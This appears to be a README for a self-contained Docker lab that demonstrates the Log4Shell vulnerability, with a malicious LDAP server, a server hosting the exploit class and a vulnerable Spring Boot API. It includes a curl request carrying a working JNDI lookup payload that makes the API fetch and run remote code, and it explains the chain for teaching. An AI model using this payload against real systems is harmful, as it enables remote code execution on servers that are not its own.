The git repo contains a docker compose file, servers.yml, that runs the 3 containers.
The 3 referenced Dockerfiles build and deploy the 3 containers. All 3 contain 2 stages, one to build the code and a second to deploy and run it.
This Dockerfile sets up a malicious LDAP server. It first pulls the code from the marshalsec git repo and builds it with maven:
https://github.com/mbechler/marshalsec.git
The second stage deploys the code. The LDAP server is started with a URL that it hands back to incoming lookups, pointing at where the exploit is hosted: "http://exploit-server:8888/#Exploit"
The build stage of the exploit-server container uses javac to compile the exploit to a Java class. It then hosts that .class file using a simple python webserver.
The last container builds the spring boot API and then deploys it. The API uses log4j to log details from incoming requests, including the X-Api-Version header.
Throughout the code and readme you will see the following hostnames referenced in URLs:
- ldap-server
- exploit-server
- api-server
Docker Compose puts the services on a shared network where each service name resolves to its container, so you can refer to the services by their compose service name rather than by IP.
Install Docker https://docs.docker.com/desktop/windows/install/
git clone https://github.com/JOG-NTMK/log4shell-exploit.git
cd log4shell-exploit
docker-compose -f .\servers.yml build
docker-compose -f .\servers.yml up
Docker will then output the containers being built and started. Once it's finished, call the API:
curl --location --request POST '127.0.0.1:8080/api' \
--header 'X-Api-Version: ${jndi:ldap://ldap-server:1389/Exploit}'
After calling the API there will be further output in the console. A lot of text is output, most of it an exception stack trace; that is expected and is explained below. Before the exception there are 3 very interesting lines:
log4shell-exploit-jndi-server-1 | Send LDAP reference result for Exploit redirecting to http://exploit-server:8888/Exploit.class
log4shell-exploit-exploit-server-1 | 172.20.0.4 - - [05/Mar/2022 14:24:39] "GET /Exploit.class HTTP/1.1" 200 -
log4shell-exploit-api-server-1 | You've been hacked!
When the HTTP header X-Api-Version was logged, log4j performed lookup substitution on the message and evaluated the value ${jndi:ldap://ldap-server:1389/Exploit}.
Java then performed a JNDI LDAP lookup against the supplied address and port, ldap-server:1389.
The LDAP server answered with a reference pointing at http://exploit-server:8888/Exploit.class.
The JVM fetched Exploit.class from that server, loaded it and instantiated it, so the attacker-supplied code ran inside the API process. This remote class loading only works because the demo relies on a JDK that still trusts remote codebases; from JDK 8u191 / 11.0.1 onwards com.sun.jndi.ldap.object.trustURLCodebase defaults to false and this particular path is blocked (other JNDI routes using classes already on the classpath remain, so upgrading log4j is the real fix).
The line "You've been hacked!" is printed by the exploit class. The class also creates a file in the tmp folder of the api container, showing that the payload is not limited to running Java code: it can execute shell commands as well.
The exception that follows is expected: the malicious server does not return a real LDAP object, so once the Exploit class has run, the JNDI lookup itself fails and the API logs the error.